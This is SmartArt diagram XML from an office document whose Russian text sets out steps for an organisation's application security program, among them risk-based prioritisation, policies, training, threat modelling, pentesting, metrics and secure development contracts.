    <dgm:cxn modelId="{21CCE488-FA7F-384A-A5E5-F7531C2F7A2D}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FD2F938D-2268-1D44-B5FE-1C8D4ECBCC08}" type="presOf" srcId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6C048991-4CC6-48F3-85DE-06094639B4B0}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" srcOrd="1" destOrd="0" parTransId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" sibTransId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}"/>
    <dgm:cxn modelId="{97452B92-22D7-4E80-B74D-5D72DE542765}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" srcOrd="2" destOrd="0" parTransId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" sibTransId="{56B4B5BC-D671-4D10-91B2-18BB09341248}"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{C2FA6099-3E27-E342-AE5C-972353DC41D1}" type="presOf" srcId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{953325A0-207E-4AE6-A6DC-14B69025B19F}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" srcOrd="1" destOrd="0" parTransId="{21595102-299C-4FC9-AD15-9036120CA438}" sibTransId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}"/>
    <dgm:cxn modelId="{5368E3A4-753E-674F-8CE6-22C51467BAEB}" type="presOf" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{34810BA8-ABE6-4135-9DA7-66092273C67F}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" srcOrd="2" destOrd="0" parTransId="{918768C3-D12F-4161-B487-A57F29898241}" sibTransId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}"/>
    <dgm:cxn modelId="{E2BFD8A9-22B4-1240-BF50-4B01A6E7275B}" type="presOf" srcId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2B332EAB-1224-4EC7-902F-FB64603358D2}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" srcOrd="2" destOrd="0" parTransId="{DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" sibTransId="{E2D6A2A1-5438-4DC5-806B-70724658813A}"/>
    <dgm:cxn modelId="{48311AAE-790D-405B-BEB3-7AB59042F49A}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" srcOrd="4" destOrd="0" parTransId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" sibTransId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}"/>
    <dgm:cxn modelId="{0EBC86B2-1B2E-D743-B1FC-2B9051176604}" type="presOf" srcId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{69EE8DB2-9B40-A74C-B13B-F75E364BF485}" type="presOf" srcId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{787CB7B5-E746-6047-BB7E-D4FE8ECA58C5}" type="presOf" srcId="{495252AF-5996-4B38-A1EE-B648650A10A0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AF2510C7-6052-8541-A135-695302800E06}" type="presOf" srcId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{769E66C8-4148-2240-9F82-F8B9B86E9AD9}" type="presOf" srcId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3DC27ECB-9A01-3146-9464-C901F1385240}" type="presOf" srcId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DE5646CC-F144-493B-9414-C6346E590FF4}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{719FD505-9C05-4301-8C8D-24A4329404ED}" srcOrd="1" destOrd="0" parTransId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" sibTransId="{595F5683-5B41-4144-8717-8475FEB51759}"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{BDA0A2DB-50A7-9E41-8394-C10237C43F67}" type="presOf" srcId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}" srcOrd="1" destOrd="0" parTransId="{4707E43C-0E63-42FE-96E7-6097CEC31A66}" sibTransId="{9E962D11-84F0-4781-87CC-1DC58D8334B3}"/>
    <dgm:cxn modelId="{078F00E1-EAB6-A043-AFB5-E1656B653584}" type="presOf" srcId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" srcOrd="0" destOrd="0" parTransId="{C08C42A3-E914-4795-97F3-69296AA3F73D}" sibTransId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}"/>
    <dgm:cxn modelId="{FF00CEEE-F35C-9546-AC8A-68AC5AFF469D}" type="presOf" srcId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" srcOrd="2" destOrd="0" parTransId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" sibTransId="{5B6FED2A-CCAD-4150-BE86-460500775F70}"/>
    <dgm:cxn modelId="{DB4CA1F8-15B9-3A4B-B718-7A58463FABD6}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8996A8FB-24E4-B049-9B18-D49F709DEB3F}" type="presOf" srcId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" srcOrd="0" destOrd="0" parTransId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" sibTransId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}"/>
    <dgm:cxn modelId="{EFC497FF-F4BF-8A4D-BB9C-FEC4EE7DF41E}" type="presOf" srcId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1B9CEEEF-B590-6546-A8FA-65481850F03B}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4EE10CB5-4BE3-1C45-8240-2E12B2E1802E}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D2B1083B-7A29-7B43-BA2C-2184545B228D}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BA3A7E3-E84F-4345-B611-4F05B37E9766}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{805C12C8-02B1-D44E-ACA5-33DE72B5354E}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2571DEAF-E7E1-9544-988F-2794B0561896}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E85F539A-BC24-A643-8A82-74E0A248E796}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2D4DA5FB-B685-2840-95AF-EED70A5E76DC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{54EB2D14-F3B8-884A-9CCE-27337A269EEC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F12356CA-3059-A643-BF4A-B03AB991DBB7}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F8713194-CCEE-F442-95F1-F9A554AF2696}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{60D65AF9-BF19-404F-A306-5E33BBA4E8AD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0CFAEE97-93B4-2641-B56D-FE9B117A0790}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8487FD00-89CD-BB4E-9B87-B88C12D99039}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{714ABA64-4921-5E43-A5A7-2F2032C9B7DF}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B8C4920A-1372-D948-950F-46AE477CC44D}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4885C4A3-6CAC-4448-BF35-F04DF081AB89}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3A56FA47-AFF8-384F-91A7-E539DD5E74B8}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A5271366-05D0-3D44-B41D-921B4E83A7B4}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5FC118EC-9B14-A947-BF90-36342C9C22EE}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{78713489-5D47-416E-ADAE-302406F812AE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{54A92ACA-A4B5-D446-9BDC-8335A6E24387}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BA50C33-B6A2-B64E-99A4-4FA9C6D44B62}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DF919368-C128-834B-B8DF-417D170C0CB6}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF62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48348-3383-4156-B7CD-1CB7092349F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4221491" y="-2166073"/>
          <a:ext cx="1149498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Задокументируйте все приложения и связанные с ними данные. Крупным организациям рекомендуется использовать для этих целей базу данных управления конфигурацией.</a:t>
          </a:r>
        </a:p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программу обеспечения безопасности приложений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начните ее реализацию. </a:t>
          </a:r>
        </a:p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Проведите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2"/>
            </a:rPr>
            <a:t>анализ недостающих возможностей, сравнив свою организацию с другими компаниями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чтобы определить ключевые области улучшения и план действий. </a:t>
          </a:r>
        </a:p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Получите одобрение руководства и разработайте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3"/>
            </a:rPr>
            <a:t>план повышения осведомленности о безопасности приложений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для данной организации.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2072578" y="95068"/>
        <a:ext cx="5447324" cy="1037270"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="952919" y="46542"/>
          <a:ext cx="1062044" cy="122726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Начало работы</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1004764" y="98387"/>
        <a:ext cx="958354" cy="1123572"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4262474" y="-853484"/>
          <a:ext cx="1260547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4"/>
            </a:rPr>
            <a:t>требуемый уровень защиты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ваших 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4"/>
            </a:rPr>
            <a:t>приложений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точки зрения бизнеса. При этом руководствуйтесь законами о конфиденциальности и другими нормативными документами, относящимися к защищаемым данным. </a:t>
          </a:r>
        </a:p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5"/>
            </a:rPr>
            <a:t>модель оценки наиболее распространенных угроз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указанием факторов вероятности и риска, отражающих устойчивость вашей организации к атакам. </a:t>
          </a:r>
        </a:p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и </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="120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приоритизируйте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 приложения и API. Внесите результаты в БД управления конфигурацией. </a:t>
          </a:r>
        </a:p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руководство по корректному определению требуемого уровня покрытия и точности.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174507" y="1357553"/>
        <a:ext cx="5436482" cy="1137477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="954420" y="1313360"/>
          <a:ext cx="1158551" cy="12258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Общий подход на основе рисков</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1010976" y="1369916"/>
        <a:ext cx="1045439" cy="1112749"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4277404" y="459269"/>
          <a:ext cx="1110101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специальные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6"/>
            </a:rPr>
            <a:t>политики и стандарты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использоваться всеми разработчиками в качестве основ обеспечения безопасности приложений.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7"/>
            </a:rPr>
            <a:t>набор стандартных средств обеспечения безопасности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дополнять эти политики и стандарты, а также содержать руководство по их использованию при проектировании и разработке.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8"/>
            </a:rPr>
            <a:t>курсы по обеспечению безопасности приложений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посвященные разным темам и целям разработки.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2106870" y="2738185"/>
        <a:ext cx="5451170" cy="1001719"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="954420" y="2625248"/>
          <a:ext cx="1098258" cy="12275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Подготовка надежной базы</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1008033" y="2678861"/>
        <a:ext cx="991032" cy="1120366"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4525179" y="1582186"/>
          <a:ext cx="854848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и внедрите в существующие процессы разработки и эксплуатации мероприятия по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9"/>
            </a:rPr>
            <a:t>безопасной реализации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0"/>
            </a:rPr>
            <a:t>контролю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 Состав работ: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1"/>
            </a:rPr>
            <a:t>моделирование угроз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безопасное проектирование и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2"/>
            </a:rPr>
            <a:t>анализ проектов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написание безопасного кода и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3"/>
            </a:rPr>
            <a:t>его анализ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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="120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4"/>
            </a:rPr>
            <a:t>пентест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устранение недостатков.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Для достижения успеха обеспечьте наличие экспертов в предметной области и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5"/>
            </a:rPr>
            <a:t>служб поддержки для разработчиков и проектной команды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</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2214557" y="3976268"/>
        <a:ext cx="5476092" cy="771388"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="954420" y="3921525"/>
          <a:ext cx="1218407" cy="8808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Интеграция </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="90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безопасности в </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="85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существующие</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="100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процессы</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="997421" y="3964526"/>
        <a:ext cx="1132405" cy="794872"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4332059" y="2703730"/>
          <a:ext cx="1121376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Работайте с метриками. Принимайте решения об улучшениях и финансировании на основе метрик и данных аналитики. Метрики должны отражать средства и методы обеспечения безопасности, обнаруженные и устраненные уязвимости, покрытие приложения, описание ошибок по типу и количеству и т. п.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компании. Учитывайте ошибки и предлагайте поощрения для продвижения улучшений.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2167712" y="4977559"/>
        <a:ext cx="5450070" cy="1011894"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="954420" y="4871084"/>
          <a:ext cx="1158551" cy="122484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 dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1010976" y="4927640"/>
        <a:ext cx="1045439" cy="1111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48348-3383-4156-B7CD-1CB7092349F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3478659" y="-2223291"/>
          <a:ext cx="973752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55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Соберите и обсудите с заказчиком бизнес-требования к приложению, включая обеспечение конфиденциальности, подлинности, целостности и доступности всех информационных активов, а также ожидаемую бизнес-логику.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="355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Составьте перечень технических требований, включая  функциональные и нефункциональные требования по безопасности.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="355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обсудите бюджет, охватывающий все аспекты проектирования, создания, тестирования и эксплуатации, а также работы по обеспечению безопасности.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1297917" y="52521"/>
        <a:ext cx="5335237" cy="878682"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="134398" y="6744"/>
          <a:ext cx="1115983" cy="9702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Требования и управление ресурсами</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="181761" y="54107"/>
        <a:ext cx="1021257" cy="875508"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3448836" y="-1099313"/>
          <a:ext cx="1033398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требования с внутренними и внешними разработчиками, включая нормативы и требования вашей программы обеспечения безопасности, например рекомендации по жизненному циклу разработки ПО.</a:t>
          </a:r>
        </a:p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выполнение всех технических требований, включая этап планирования и проектирования.</a:t>
          </a:r>
        </a:p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все технические требования, включая проектирование, безопасность и гарантийные обязательства.</a:t>
          </a:r>
        </a:p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Используйте шаблоны и контрольные списки, например </a:t>
          </a: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Приложение по безопасности к Контракту на разработку ПО от OWASP</a:t>
          </a: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. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="780" b="1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Примечание:</a:t>
          </a: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 приложение применимо к договорному праву США, проконсультируйтесь с юристом перед его использованием.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300828" y="1149587"/>
